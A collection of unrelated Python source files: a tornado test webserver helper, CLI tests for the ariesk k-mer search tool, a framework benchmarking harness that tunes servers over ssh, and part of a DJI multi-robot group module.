self.ioloop = tornado.ioloop.IOLoop()
self.ioloop.make_current()
self.application = tornado.web.Application(
[(r'/(.*)', self.handler, {'path': self.root})])
self.application.listen(self.port)
self.ioloop.start()
@property
def listening(self):
if self.port is None:
return False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex(('127.0.0.1', self.port)) == 0
sock.close()  # close the probe socket so polling does not leak a file descriptor
return result
def url(self, path):
'''
Convenience function which, given a file path, will return a URL that
points to that path. If the path is relative, it will just be appended
to self.web_root.
'''
if self.web_root is None:
raise RuntimeError('Webserver instance has not been started')
err_msg = 'invalid path, must be either a relative path or a path ' \
'within {0}'.format(self.root)
try:
relpath = path \
if not os.path.isabs(path) \
else os.path.relpath(path, self.root)
if relpath.startswith('..' + os.sep):
raise ValueError(err_msg)
return '/'.join((self.web_root, relpath))
except AttributeError:
raise ValueError(err_msg)
def start(self):
'''
Starts the webserver
'''
if self.port is None:
self.port = get_unused_localhost_port()
self.web_root = 'http://127.0.0.1:{0}'.format(self.port)
self.server_thread = threading.Thread(target=self.target)
self.server_thread.daemon = True
self.server_thread.start()
for idx in range(self.wait + 1):
if self.listening:
break
if idx != self.wait:
time.sleep(1)
else:
raise Exception(
'Failed to start tornado webserver on 127.0.0.1:{0} within '
'{1} seconds'.format(self.port, self.wait)
)
def stop(self):
'''
Stops the webserver
'''
self.ioloop.add_callback(self.ioloop.stop)
self.server_thread.join()
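# Hedged usage sketch (assumes the Webserver class above; the web root and
# file name are hypothetical): serve a directory for the duration of a test
# and build a URL into it.
#
#   webserver = Webserver(root='/path/to/web/root')
#   webserver.start()
#   try:
#       url = webserver.url('index.html')  # http://127.0.0.1:<port>/index.html
#   finally:
#       webserver.stop()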
|
_test_cli_main.py
|
from kthread import KThread
from os.path import join, dirname, abspath
from os import remove
from unittest import TestCase
from click.testing import CliRunner
from ariesk.cli import main
from ariesk.search_server import (
SearchServer,
SearchClient,
)
GRID_COVER = abspath(join(dirname(__file__), 'small_grid_cover.sqlite'))
KMER_TABLE = abspath(join(dirname(__file__), 'small_31mer_table.csv'))
KMER_ROTATION = abspath(join(dirname(__file__), '../data/rotation_minikraken.json'))
PORT = 5431
KMER_31 = 'AATACGTCCGGAGTATCGACGCACACATGGT'
def run_server():
SearchServer.from_filepath(PORT, GRID_COVER, auto_start=True)
class TestMainCli(TestCase):
'''
def test_search_server_cli(self):
runner = CliRunner()
server_thread = KThread(target=run_server)
try:
server_thread.start()
results = runner.invoke(
main,
['search', 'seq', f'-p {PORT}', '--search-mode=full', '-r 0', '-i 0.1', KMER_31]
)
self.assertIn(KMER_31, results.output)
runner.invoke(main, ['shutdown-server', f'-p {PORT}'])
finally:
if server_thread.is_alive():
server_thread.terminate()
'''
'''
def test_search_file_server_cli(self):
runner = CliRunner()
server_thread = KThread(target=run_server)
with runner.isolated_filesystem():
outfile = 'temp.test_file_search.csv'
try:
server_thread.start()
result = runner.invoke(
main,
[
'search', 'file', f'-p {PORT}', '--search-mode=coarse', '-r 0', '-i 0.1',
outfile, KMER_TABLE
])
self.assertEqual(result.exit_code, 0)
runner.invoke(main, ['shutdown-search-server', f'-p {PORT}'])
finally:
if server_thread.is_alive():
server_thread.terminate()
'''
def test_build_db_cli(self):
runner = CliRunner()
with runner.isolated_filesystem():
db_path = 'temp.db_cli_test.sqlite'
result = runner.invoke(
main, [
'build', 'grid', '-r 0.5', '-d 4', '-n 50',
'-s 50', f'-o={db_path}',
KMER_ROTATION, KMER_TABLE
])
self.assertEqual(result.exit_code, 0)
def test_db_stats(self):
runner = CliRunner()
result = runner.invoke(main, ['stats', 'cover-stats', GRID_COVER])
self.assertEqual(result.exit_code, 0)
self.assertIn('kmers\t100', result.output)
|
benchmarker.py
|
from setup.linux.installer import Installer
from benchmark import framework_test
import os
import json
import subprocess
import time
import textwrap
import pprint
import csv
import sys
import logging
import socket
import glob
from multiprocessing import Process
from datetime import datetime
class Benchmarker:
##########################################################################################
# Public methods
##########################################################################################
############################################################
# Prints all the available tests
############################################################
def run_list_tests(self):
all_tests = self.__gather_tests
for test in all_tests:
print test.name
self.__finish()
############################################################
# End run_list_tests
############################################################
############################################################
# Prints the metadata for all the available tests
############################################################
def run_list_test_metadata(self):
all_tests = self.__gather_tests
all_tests_json = json.dumps(map(lambda test: {
"name": test.name,
"approach": test.approach,
"classification": test.classification,
"database": test.database,
"framework": test.framework,
"language": test.language,
"orm": test.orm,
"platform": test.platform,
"webserver": test.webserver,
"os": test.os,
"database_os": test.database_os,
"display_name": test.display_name,
"notes": test.notes,
"versus": test.versus
}, all_tests))
with open(os.path.join(self.full_results_directory(), "test_metadata.json"), "w") as f:
f.write(all_tests_json)
self.__finish()
############################################################
# End run_list_test_metadata
############################################################
############################################################
# parse_timestamp
# Re-parses the raw data for a given timestamp
############################################################
def parse_timestamp(self):
all_tests = self.__gather_tests
for test in all_tests:
test.parse_all()
self.__parse_results(all_tests)
self.__finish()
############################################################
# End parse_timestamp
############################################################
############################################################
# Run the tests:
# This process involves setting up the client/server machines
# with any necessary change. Then going through each test,
# running their setup script, verifying the URLs, and
# running benchmarks against them.
############################################################
def run(self):
##########################
# Get a list of all known
# tests that we can run.
##########################
all_tests = self.__gather_tests
##########################
# Setup client/server
##########################
print textwrap.dedent("""
=====================================================
Preparing Server, Database, and Client ...
=====================================================
""")
self.__setup_server()
self.__setup_database()
self.__setup_client()
## Check if wrk (and wrk-pipeline) is installed and executable, if not, raise an exception
#if not (os.access("/usr/local/bin/wrk", os.X_OK) and os.access("/usr/local/bin/wrk-pipeline", os.X_OK)):
# raise Exception("wrk and/or wrk-pipeline are not properly installed. Not running tests.")
##########################
# Run tests
##########################
print textwrap.dedent("""
=====================================================
Running Tests ...
=====================================================
""")
self.__run_tests(all_tests)
##########################
# Parse results
##########################
if self.mode == "benchmark":
print textwrap.dedent("""
=====================================================
Parsing Results ...
=====================================================
""")
self.__parse_results(all_tests)
self.__finish()
############################################################
# End run
############################################################
############################################################
# database_sftp_string(batch_file)
# generates a fully qualified URL for sftp to database
############################################################
def database_sftp_string(self, batch_file):
sftp_string = "sftp -oStrictHostKeyChecking=no "
if batch_file != None: sftp_string += " -b " + batch_file + " "
if self.database_identity_file != None:
sftp_string += " -i " + self.database_identity_file + " "
return sftp_string + self.database_user + "@" + self.database_host
############################################################
# End database_sftp_string
############################################################
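# Illustrative (all values hypothetical): with batch_file='cmds.txt', an
# identity file, and user/host 'tfb'/'db.local', the concatenation above
# yields (note the double spaces the concatenation leaves behind):
#   sftp -oStrictHostKeyChecking=no  -b cmds.txt  -i ~/.ssh/id_rsa tfb@db.local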
############################################################
# client_sftp_string(batch_file)
# generates a fully qualified URL for sftp to client
############################################################
def client_sftp_string(self, batch_file):
sftp_string = "sftp -oStrictHostKeyChecking=no "
if batch_file != None: sftp_string += " -b " + batch_file + " "
if self.client_identity_file != None:
sftp_string += " -i " + self.client_identity_file + " "
return sftp_string + self.client_user + "@" + self.client_host
############################################################
# End client_sftp_string
############################################################
############################################################
# generate_url(url, port)
# generates a fully qualified URL for accessing a test url
############################################################
def generate_url(self, url, port):
return self.server_host + ":" + str(port) + url
############################################################
# End generate_url
############################################################
############################################################
# get_output_file(test_name, test_type)
# returns the output file name for this test_name and
# test_type timestamp/test_type/test_name/raw
############################################################
def get_output_file(self, test_name, test_type):
return os.path.join(self.result_directory, self.timestamp, test_type, test_name, "raw")
############################################################
# End get_output_file
############################################################
############################################################
# output_file(test_name, test_type)
# returns the output file for this test_name and test_type
# timestamp/test_type/test_name/raw
############################################################
def output_file(self, test_name, test_type):
path = self.get_output_file(test_name, test_type)
try:
os.makedirs(os.path.dirname(path))
except OSError:
pass
return path
############################################################
# End output_file
############################################################
############################################################
# get_warning_file(test_name, test_type)
# returns the warning file name for this test_name and
# test_type timestamp/test_type/test_name/warn
############################################################
def get_warning_file(self, test_name, test_type):
return os.path.join(self.result_directory, self.timestamp, test_type, test_name, "warn")
############################################################
# End get_warning_file
############################################################
############################################################
# warning_file(test_name, test_type)
# returns the warning file for this test_name and test_type
# timestamp/test_type/test_name/warn
############################################################
def warning_file(self, test_name, test_type):
path = self.get_warning_file(test_name, test_type)
try:
os.makedirs(os.path.dirname(path))
except OSError:
pass
return path
############################################################
# End warning_file
############################################################
############################################################
# full_results_directory
############################################################
def full_results_directory(self):
path = os.path.join(self.result_directory, self.timestamp)
try:
os.makedirs(path)
except OSError:
pass
return path
############################################################
# End full_results_directory
############################################################
############################################################
# Latest intermediate results directory
############################################################
def latest_results_directory(self):
path = os.path.join(self.result_directory,"latest")
try:
os.makedirs(path)
except OSError:
pass
return path
############################################################
# report_results
############################################################
def report_results(self, framework, test, results):
if test not in self.results['rawData'].keys():
self.results['rawData'][test] = dict()
# If results has a size from the parse, then it succeeded.
if results:
self.results['rawData'][test][framework.name] = results
# This may already be set for single-tests
if framework.name not in self.results['succeeded'][test]:
self.results['succeeded'][test].append(framework.name)
# Add this type
if (os.path.exists(self.get_warning_file(framework.name, test)) and
framework.name not in self.results['warning'][test]):
self.results['warning'][test].append(framework.name)
else:
# This may already be set for single-tests
if framework.name not in self.results['failed'][test]:
self.results['failed'][test].append(framework.name)
############################################################
# End report_results
############################################################
##########################################################################################
# Private methods
##########################################################################################
############################################################
# Gathers all the tests
############################################################
@property
def __gather_tests(self):
tests = []
# Assume we are running from FrameworkBenchmarks
config_files = glob.glob('*/benchmark_config')
for config_file_name in config_files:
# Look for the benchmark_config file, this will set up our tests.
# Its format looks like this:
#
# {
# "framework": "nodejs",
# "tests": [{
# "default": {
# "setup_file": "setup",
# "json_url": "/json"
# },
# "mysql": {
# "setup_file": "setup",
# "db_url": "/mysql",
# "query_url": "/mysql?queries="
# },
# ...
# }]
# }
config = None
with open(config_file_name, 'r') as config_file:
# Load json file into config object
try:
config = json.load(config_file)
except:
print("Error loading '%s'." % config_file_name)
raise
if config is None:
continue
test = framework_test.parse_config(config, os.path.dirname(config_file_name), self)
# If the user specified which tests to run, then
# we can skip over tests that are not in that list
if self.test == None:
tests = tests + test
else:
for atest in test:
if atest.name in self.test:
tests.append(atest)
tests.sort(key=lambda x: x.name)
return tests
############################################################
# End __gather_tests
############################################################
############################################################
# Gathers all the frameworks
############################################################
def __gather_frameworks(self):
frameworks = []
# Loop through each directory (we assume we're being run from the benchmarking root)
for dirname, dirnames, filenames in os.walk('.'):
# Look for the benchmark_config file, this will contain our framework name
# Its format looks like this:
#
# {
# "framework": "nodejs",
# "tests": [{
# "default": {
# "setup_file": "setup",
# "json_url": "/json"
# },
# "mysql": {
# "setup_file": "setup",
# "db_url": "/mysql",
# "query_url": "/mysql?queries="
# },
# ...
# }]
# }
if 'benchmark_config' in filenames:
config = None
with open(os.path.join(dirname, 'benchmark_config'), 'r') as config_file:
# Load json file into config object
config = json.load(config_file)
if config == None:
continue
frameworks.append(str(config['framework']))
return frameworks
############################################################
# End __gather_frameworks
############################################################
############################################################
# Makes any necessary changes to the server that should be
# made before running the tests. This involves setting kernel
# settings to allow for more connections and more file
# descriptors
#
# http://redmine.lighttpd.net/projects/weighttp/wiki#Troubleshooting
############################################################
def __setup_server(self):
try:
if os.name == 'nt':
return True
# This doesn't seem to ever run correctly, which causes the rest to not be run.
#subprocess.check_call(["sudo","bash","-c","cd /sys/devices/system/cpu; ls -d cpu*|while read x; do echo performance > $x/cpufreq/scaling_governor; done"])
subprocess.check_call("sudo sysctl -w net.ipv4.tcp_max_syn_backlog=65535".rsplit(" "))
subprocess.check_call("sudo sysctl -w net.core.somaxconn=65535".rsplit(" "))
subprocess.check_call("sudo -s ulimit -n 65535".rsplit(" "))
subprocess.check_call("sudo sysctl net.ipv4.tcp_tw_reuse=1".rsplit(" "))
subprocess.check_call("sudo sysctl net.ipv4.tcp_tw_recycle=1".rsplit(" "))
subprocess.check_call("sudo sysctl -w kernel.shmmax=134217728".rsplit(" "))
subprocess.check_call("sudo sysctl -w kernel.shmall=2097152".rsplit(" "))
except subprocess.CalledProcessError:
return False
############################################################
# End __setup_server
############################################################
############################################################
# Makes any necessary changes to the database machine that
# should be made before running the tests. Is very similar
# to the server setup, but may also include database specific
# changes.
############################################################
def __setup_database(self):
p = subprocess.Popen(self.database_ssh_string, stdin=subprocess.PIPE, shell=True)
p.communicate("""
sudo sysctl -w net.ipv4.tcp_max_syn_backlog=65535
sudo sysctl -w net.core.somaxconn=65535
sudo -s ulimit -n 65535
sudo sysctl net.ipv4.tcp_tw_reuse=1
sudo sysctl net.ipv4.tcp_tw_recycle=1
sudo sysctl -w kernel.shmmax=2147483648
sudo sysctl -w kernel.shmall=2097152
""")
############################################################
# End __setup_database
############################################################
############################################################
# Makes any necessary changes to the client machine that
# should be made before running the tests. Is very similar
# to the server setup, but may also include client specific
# changes.
############################################################
def __setup_client(self):
p = subprocess.Popen(self.client_ssh_string, stdin=subprocess.PIPE, shell=True)
p.communicate("""
sudo sysctl -w net.ipv4.tcp_max_syn_backlog=65535
sudo sysctl -w net.core.somaxconn=65535
sudo -s ulimit -n 65535
sudo sysctl net.ipv4.tcp_tw_reuse=1
sudo sysctl net.ipv4.tcp_tw_recycle=1
sudo sysctl -w kernel.shmmax=2147483648
sudo sysctl -w kernel.shmall=2097152
""")
############################################################
# End __setup_client
############################################################
############################################################
# __run_tests
#
# 2013-10-02 ASB Calls each test passed in tests to
# __run_test in a separate process. Each
# test is given a set amount of time, and if
# it exceeds that time the child process (and
# subsequently all of its child processes) is
# killed. Uses the multiprocessing module.
############################################################
def __run_tests(self, tests):
logging.debug("Start __run_tests.")
logging.debug("__name__ = %s",__name__)
if self.os.lower() == 'windows':
logging.debug("Executing __run_tests on Windows")
for test in tests:
self.__run_test(test)
else:
logging.debug("Executing __run_tests on Linux")
# These features do not work on Windows
for test in tests:
if __name__ == 'benchmark.benchmarker':
print textwrap.dedent("""
-----------------------------------------------------
Running Test: {name} ...
-----------------------------------------------------
""".format(name=test.name))
test_process = Process(target=self.__run_test, args=(test,))
test_process.start()
test_process.join(self.run_test_timeout_seconds)
if(test_process.is_alive()):
logging.debug("Child process for {name} is still alive. Terminating.".format(name=test.name))
self.__write_intermediate_results(test.name,"__run_test timeout (="+ str(self.run_test_timeout_seconds) + " seconds)")
test_process.terminate()
logging.debug("End __run_tests.")
############################################################
# End __run_tests
############################################################
############################################################
# __run_test
# 2013-10-02 ASB Previously __run_tests. This code now only
# processes a single test.
#
# Runs a single test: restarts the databases if the test
# needs them, starts the test, verifies its URLs, optionally
# benchmarks it, and then stops it, logging output to
# out.txt/err.txt along the way.
############################################################
def __run_test(self, test):
try:
os.makedirs(os.path.join(self.latest_results_directory, 'logs', "{name}".format(name=test.name)))
except:
pass
with open(os.path.join(self.latest_results_directory, 'logs', "{name}".format(name=test.name), 'out.txt'), 'w') as out, \
open(os.path.join(self.latest_results_directory, 'logs', "{name}".format(name=test.name), 'err.txt'), 'w') as err:
if hasattr(test, 'skip'):
if test.skip.lower() == "true":
out.write("Test {name} benchmark_config specifies to skip this test. Skipping.\n".format(name=test.name))
return
if test.os.lower() != self.os.lower() or test.database_os.lower() != self.database_os.lower():
# the operating system requirements of this test for the
# application server or the database server don't match
# our current environment
out.write("OS or Database OS specified in benchmark_config does not match the current environment. Skipping.\n")
return
# If the test is in the excludes list, we skip it
if self.exclude != None and test.name in self.exclude:
out.write("Test {name} has been added to the excludes list. Skipping.\n".format(name=test.name))
return
# If the test does not contain an implementation of the current test-type, skip it
if self.type != 'all' and not test.contains_type(self.type):
out.write("Test type {type} does not contain an implementation of the current test-type. Skipping.\n".format(type=self.type))
return
out.write("test.os.lower() = {os} test.database_os.lower() = {dbos}\n".format(os=test.os.lower(),dbos=test.database_os.lower()))
out.write("self.results['frameworks'] != None: {val}\n".format(val=str(self.results['frameworks'] != None)))
out.write("test.name: {name}\n".format(name=str(test.name)))
out.write("self.results['completed']: {completed}\n".format(completed=str(self.results['completed'])))
if self.results['frameworks'] != None and test.name in self.results['completed']:
out.write('Framework {name} found in latest saved data. Skipping.\n'.format(name=str(test.name)))
return
out.flush()
out.write( textwrap.dedent("""
=====================================================
Beginning {name}
-----------------------------------------------------
""".format(name=test.name)) )
out.flush()
##########################
# Start this test
##########################
out.write( textwrap.dedent("""
-----------------------------------------------------
Starting {name}
-----------------------------------------------------
""".format(name=test.name)) )
out.flush()
try:
if test.requires_database():
p = subprocess.Popen(self.database_ssh_string, stdin=subprocess.PIPE, stdout=out, stderr=err, shell=True)
p.communicate("""
sudo restart mysql
sudo restart mongodb
sudo /etc/init.d/postgresql restart
""")
time.sleep(10)
if self.__is_port_bound(test.port):
self.__write_intermediate_results(test.name, "port " + str(test.port) + " is not available before start")
err.write( textwrap.dedent("""
---------------------------------------------------------
Error: Port {port} is not available before start {name}
---------------------------------------------------------
""".format(name=test.name, port=str(test.port))) )
err.flush()
return
result = test.start(out, err)
if result != 0:
test.stop(out, err)
time.sleep(5)
err.write( "ERROR: Problem starting {name}\n".format(name=test.name) )
err.write( textwrap.dedent("""
-----------------------------------------------------
Stopped {name}
-----------------------------------------------------
""".format(name=test.name)) )
err.flush()
self.__write_intermediate_results(test.name,"<setup.py>#start() returned non-zero")
return
time.sleep(self.sleep)
##########################
# Verify URLs
##########################
test.verify_urls(out, err)
out.flush()
err.flush()
##########################
# Benchmark this test
##########################
if self.mode == "benchmark":
out.write( textwrap.dedent("""
-----------------------------------------------------
Benchmarking {name} ...
-----------------------------------------------------
""".format(name=test.name)) )
out.flush()
test.benchmark(out, err)
out.flush()
err.flush()
##########################
# Stop this test
##########################
out.write( textwrap.dedent("""
-----------------------------------------------------
Stopping {name}
-----------------------------------------------------
""".format(name=test.name)) )
out.flush()
test.stop(out, err)
out.flush()
err.flush()
time.sleep(5)
if self.__is_port_bound(test.port):
self.__write_intermediate_results(test.name, "port " + str(test.port) + " was not released by stop")
err.write( textwrap.dedent("""
-----------------------------------------------------
Error: Port {port} was not released by stop {name}
-----------------------------------------------------
""".format(name=test.name, port=str(test.port))) )
err.flush()
return
out.write( textwrap.dedent("""
-----------------------------------------------------
Stopped {name}
-----------------------------------------------------
""".format(name=test.name)) )
out.flush()
time.sleep(5)
##########################################################
# Save results thus far into toolset/benchmark/latest.json
##########################################################
out.write( textwrap.dedent("""
----------------------------------------------------
Saving results through {name}
----------------------------------------------------
""".format(name=test.name)) )
out.flush()
self.__write_intermediate_results(test.name,time.strftime("%Y%m%d%H%M%S", time.localtime()))
except (OSError, IOError, subprocess.CalledProcessError) as e:
self.__write_intermediate_results(test.name,"<setup.py> raised an exception")
err.write( textwrap.dedent("""
-----------------------------------------------------
Subprocess Error {name}
-----------------------------------------------------
{err}
{trace}
""".format(name=test.name, err=e, trace=sys.exc_info()[:2])) )
err.flush()
try:
test.stop(out, err)
except (subprocess.CalledProcessError) as e:
self.__write_intermediate_results(test.name,"<setup.py>#stop() raised an error")
err.write( textwrap.dedent("""
-----------------------------------------------------
Subprocess Error: Test .stop() raised exception {name}
-----------------------------------------------------
{err}
{trace}
""".format(name=test.name, err=e, trace=sys.exc_info()[:2])) )
err.flush()
except (KeyboardInterrupt, SystemExit) as e:
test.stop(out, err)
out.write( """
-----------------------------------------------------
Cleaning up....
-----------------------------------------------------
""")
out.flush()
self.__finish()
sys.exit()
out.close()
err.close()
############################################################
# End __run_tests
############################################################
############################################################
# __is_port_bound
# Check if the requested port is available. If it
# isn't available, then a previous test probably didn't
# shut down properly.
############################################################
def __is_port_bound(self, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# Try to bind to all IP addresses, this port
s.bind(("", port))
# If we get here, we were able to bind successfully,
# which means the port is free.
except:
# If we get an exception, it might be because the port is still bound
# which would be bad, or maybe it is a privileged port (<1024) and we
# are not running as root, or maybe the server is gone, but sockets are
# still in TIME_WAIT (SO_REUSEADDR). To determine which scenario, try to
# connect.
try:
s.connect(("127.0.0.1", port))
# If we get here, we were able to connect to something, which means
# that the port is still bound.
return True
except:
# An exception means that we couldn't connect, so a server probably
# isn't still running on the port.
pass
finally:
s.close()
return False
############################################################
# End __is_port_bound
############################################################
############################################################
# __parse_results
# Re-parses the raw data for all tests (including commit
# and SLOC counts) and writes the aggregated results to
# results.json in the full results directory.
############################################################
def __parse_results(self, tests):
# Run the method to get the commit count of each framework.
self.__count_commits()
# Call the method which counts the sloc for each framework
self.__count_sloc()
# Time to create parsed files
# Aggregate JSON file
with open(os.path.join(self.full_results_directory(), "results.json"), "w") as f:
f.write(json.dumps(self.results))
############################################################
# End __parse_results
############################################################
#############################################################
# __count_sloc
# This is assumed to be run from the benchmark root directory
#############################################################
def __count_sloc(self):
all_frameworks = self.__gather_frameworks()
jsonResult = {}
for framework in all_frameworks:
try:
command = "cloc --list-file=" + framework['directory'] + "/source_code --yaml"
lineCount = subprocess.check_output(command, shell=True)
# Find the last instance of the word 'code' in the yaml output. This should
# be the line count for the sum of all listed files or just the line count
# for the last file in the case where there's only one file listed.
lineCount = lineCount[lineCount.rfind('code'):len(lineCount)]
lineCount = lineCount.strip('code: ')
lineCount = lineCount[0:lineCount.rfind('comment')]
jsonResult[framework['name']] = int(lineCount)
except:
continue
self.results['rawData']['slocCounts'] = jsonResult
############################################################
# End __count_sloc
############################################################
############################################################
# __count_commits
############################################################
def __count_commits(self):
all_frameworks = self.__gather_frameworks()
jsonResult = {}
for framework in all_frameworks:
try:
command = "git rev-list HEAD -- " + framework + " | sort -u | wc -l"
commitCount = subprocess.check_output(command, shell=True)
jsonResult[framework] = int(commitCount)
except:
continue
self.results['rawData']['commitCounts'] = jsonResult
self.commits = jsonResult
############################################################
# End __count_commits
############################################################
############################################################
# __write_intermediate_results
############################################################
def __write_intermediate_results(self,test_name,status_message):
try:
self.results["completed"][test_name] = status_message
with open(os.path.join(self.latest_results_directory, 'results.json'), 'w') as f:
f.write(json.dumps(self.results))
except (IOError):
logging.error("Error writing results.json")
############################################################
# End __write_intermediate_results
############################################################
############################################################
# __finish
############################################################
def __finish(self):
print "Time to complete: " + str(int(time.time() - self.start_time)) + " seconds"
print "Results are saved in " + os.path.join(self.result_directory, self.timestamp)
############################################################
# End __finish
############################################################
##########################################################################################
# Constructor
##########################################################################################
############################################################
# Initialize the benchmarker. The args are the arguments
# parsed via argparser.
############################################################
def __init__(self, args):
self.__dict__.update(args)
self.start_time = time.time()
self.run_test_timeout_seconds = 3600
# setup logging
logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
# setup some additional variables
if self.database_user == None: self.database_user = self.client_user
if self.database_host == None: self.database_host = self.client_host
if self.database_identity_file == None: self.database_identity_file = self.client_identity_file
# setup results and latest_results directories
self.result_directory = os.path.join("results", self.name)
self.latest_results_directory = self.latest_results_directory()
if self.parse != None:
self.timestamp = self.parse
else:
self.timestamp = time.strftime("%Y%m%d%H%M%S", time.localtime())
# Setup the concurrency levels array. This array goes from
# starting_concurrency to max concurrency, doubling each time
self.concurrency_levels = []
concurrency = self.starting_concurrency
while concurrency <= self.max_concurrency:
self.concurrency_levels.append(concurrency)
concurrency = concurrency * 2
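# Worked example (hypothetical config): starting_concurrency=8 and
# max_concurrency=256 produce [8, 16, 32, 64, 128, 256].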
# Setup query interval array
# starts at 1, and goes up to max_queries, using the query_interval
self.query_intervals = []
queries = 1
while queries <= self.max_queries:
self.query_intervals.append(queries)
if queries == 1:
queries = 0
queries = queries + self.query_interval
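# Worked example (hypothetical config): max_queries=20 and query_interval=5
# produce [1, 5, 10, 15, 20]; the queries == 1 reset above is what lets the
# list start at 1 and then continue on multiples of the interval.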
# Load the latest data
#self.latest = None
#try:
# with open('toolset/benchmark/latest.json', 'r') as f:
# # Load json file into config object
# self.latest = json.load(f)
# logging.info("toolset/benchmark/latest.json loaded to self.latest")
# logging.debug("contents of latest.json: " + str(json.dumps(self.latest)))
#except IOError:
# logging.warn("IOError on attempting to read toolset/benchmark/latest.json")
#
#self.results = None
#try:
# if self.latest != None and self.name in self.latest.keys():
# with open(os.path.join(self.result_directory, str(self.latest[self.name]), 'results.json'), 'r') as f:
# # Load json file into config object
# self.results = json.load(f)
#except IOError:
# pass
self.results = None
try:
with open(os.path.join(self.latest_results_directory, 'results.json'), 'r') as f:
#Load json file into results object
self.results = json.load(f)
except IOError:
logging.warn("results.json for test %s not found.",self.name)
if self.results == None:
self.results = dict()
self.results['name'] = self.name
self.results['concurrencyLevels'] = self.concurrency_levels
self.results['queryIntervals'] = self.query_intervals
self.results['frameworks'] = [t.name for t in self.__gather_tests]
self.results['duration'] = self.duration
self.results['rawData'] = dict()
self.results['rawData']['json'] = dict()
self.results['rawData']['db'] = dict()
self.results['rawData']['query'] = dict()
self.results['rawData']['fortune'] = dict()
self.results['rawData']['update'] = dict()
self.results['rawData']['plaintext'] = dict()
self.results['completed'] = dict()
self.results['succeeded'] = dict()
self.results['succeeded']['json'] = []
self.results['succeeded']['db'] = []
self.results['succeeded']['query'] = []
self.results['succeeded']['fortune'] = []
self.results['succeeded']['update'] = []
self.results['succeeded']['plaintext'] = []
self.results['failed'] = dict()
self.results['failed']['json'] = []
self.results['failed']['db'] = []
self.results['failed']['query'] = []
self.results['failed']['fortune'] = []
self.results['failed']['update'] = []
self.results['failed']['plaintext'] = []
self.results['warning'] = dict()
self.results['warning']['json'] = []
self.results['warning']['db'] = []
self.results['warning']['query'] = []
self.results['warning']['fortune'] = []
self.results['warning']['update'] = []
self.results['warning']['plaintext'] = []
else:
#for x in self.__gather_tests():
# if x.name not in self.results['frameworks']:
# self.results['frameworks'] = self.results['frameworks'] + [x.name]
# Always overwrite framework list
self.results['frameworks'] = [t.name for t in self.__gather_tests]
# Setup the ssh command string
self.database_ssh_string = "ssh -T -o StrictHostKeyChecking=no " + self.database_user + "@" + self.database_host
self.client_ssh_string = "ssh -T -o StrictHostKeyChecking=no " + self.client_user + "@" + self.client_host
if self.database_identity_file != None:
self.database_ssh_string = self.database_ssh_string + " -i " + self.database_identity_file
if self.client_identity_file != None:
self.client_ssh_string = self.client_ssh_string + " -i " + self.client_identity_file
if self.install_software:
install = Installer(self)
install.install_software()
############################################################
# End __init__
############################################################
|
multi_group.py
|
# -*-coding:utf-8-*-
# Copyright (c) 2020 DJI.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import threading
from . import multi_module
from . import logger
from . import tool
class RobotGroupBase(object):
"""robot group object"""
def __init__(self, robots_group_list, all_robots_dict):
# Input checking should be done in MultiRobot.build_group()
self._robots_id_in_group_list = robots_group_list # robot id list
self._all_robots_dict = all_robots_dict # all robots in MultiRobot
self._group_modules_dict = {} # the modules of RobotGroup. {name:module-obj, ... }
def __del__(self):
for module_name, module_obj in self._group_modules_dict.items():
del module_obj
logger.info(
"RobotGroupBase: __del__ delete module: {}".format(module_name))
def initialize(self):
self._scan_group_module()
def get_robot(self, robot_id):
"""Get robot by robot-id
:param robot_id:
:return:
"""
return self._all_robots_dict[robot_id]
@property
def robots_num(self):
return len(self._robots_id_in_group_list)
@property
def all_robots_dict(self):
return self._all_robots_dict
def _scan_group_module(self):
pass
def get_group_module(self, name):
"""Get group module by name
:param name:
:return:
"""
get_result = True
for robot_id in self._robots_id_in_group_list:
if self._all_robots_dict[robot_id].get_module(name) is None:
get_result = False
logger.error(
"[MulitRobot] robot id {0}: the {1} module is not online".format(
robot_id, name))
if get_result:
logger.debug(
"RobotGroup: get_group_module, group modules {0}".format(
self._group_modules_dict))
return self._group_modules_dict[name]
else:
return None
@property
def robots_id_list(self):
return self._robots_id_in_group_list
def append(self, robots_id_list):
""" Add robots to the group
:param robots_id_list:
:return:
"""
check_result, robot_id = tool.check_robots_id(
robots_id_list, self._all_robots_dict)
if not check_result:
raise Exception('Robot id %d does not exist' % robot_id)
for robot_id in robots_id_list:
if robot_id in self._robots_id_in_group_list:
logger.warning(
"RobotGroupBase: robot id {0} is in group {1}".format(
robot_id, self._robots_id_in_group_list))
else:
self._robots_id_in_group_list.append(robot_id)
logger.info(
"RobotGroupBase: robot id {0} has been added into group {1}".format(
robot_id, self._robots_id_in_group_list))
def remove(self, robots_id_list):
"""remove the robots from robot group
:param robots_list: robots need to be remove
:return: True: successful, False: some robot are not in this group
"""
final_result = True
for robot_id in robots_id_list:
if robot_id not in self._robots_id_in_group_list:
logger.warning(
"RobotGroupBase: robot id {0} is not in group {1}".format(
robot_id, self._robots_id_in_group_list))
final_result = False
else:
self._robots_id_in_group_list.remove(robot_id)
logger.info(
"RobotGroupBase: robot id {0} has been removed from group {1}".format(
robot_id, self._robots_id_in_group_list))
return final_result
def execute_action(self, action_name, *args, **kw):
"""Executive function for non-instantaneous action
that have 'wait_for_all_completion()'.
:param action_name: which action need exec
:param args: the action params
:param args: the action key params
:return:
"""
action_dict = {}
for robot_id in self._robots_id_in_group_list:
robot_obj = self.all_robots_dict[robot_id]
action_dict[robot_id] = getattr(robot_obj, action_name)(*args, **kw)
logger.info("Multi Module robot id {0}: begin to execute the action".format(robot_id))
multi_action = multi_module.MultiAction(action_dict)
return multi_action
def execute_command(self, command_name, *input_args, **input_kw):
"""Executive function for instantaneous action
that do not have 'wait_for_all_completion()'.
:param command_name: which command need send
:param args: the command params
:return:
"""
start_time = time.time()
thread_dict = {} # {robot_id: thread}
result_dict = {} # {robot_id: result, ... }
for robot_id in self._robots_id_in_group_list:
robot_obj = self.all_robots_dict[robot_id]
exec_cmd_thread = tool.TelloThread(target=getattr(robot_obj, command_name), *input_args, **input_kw)
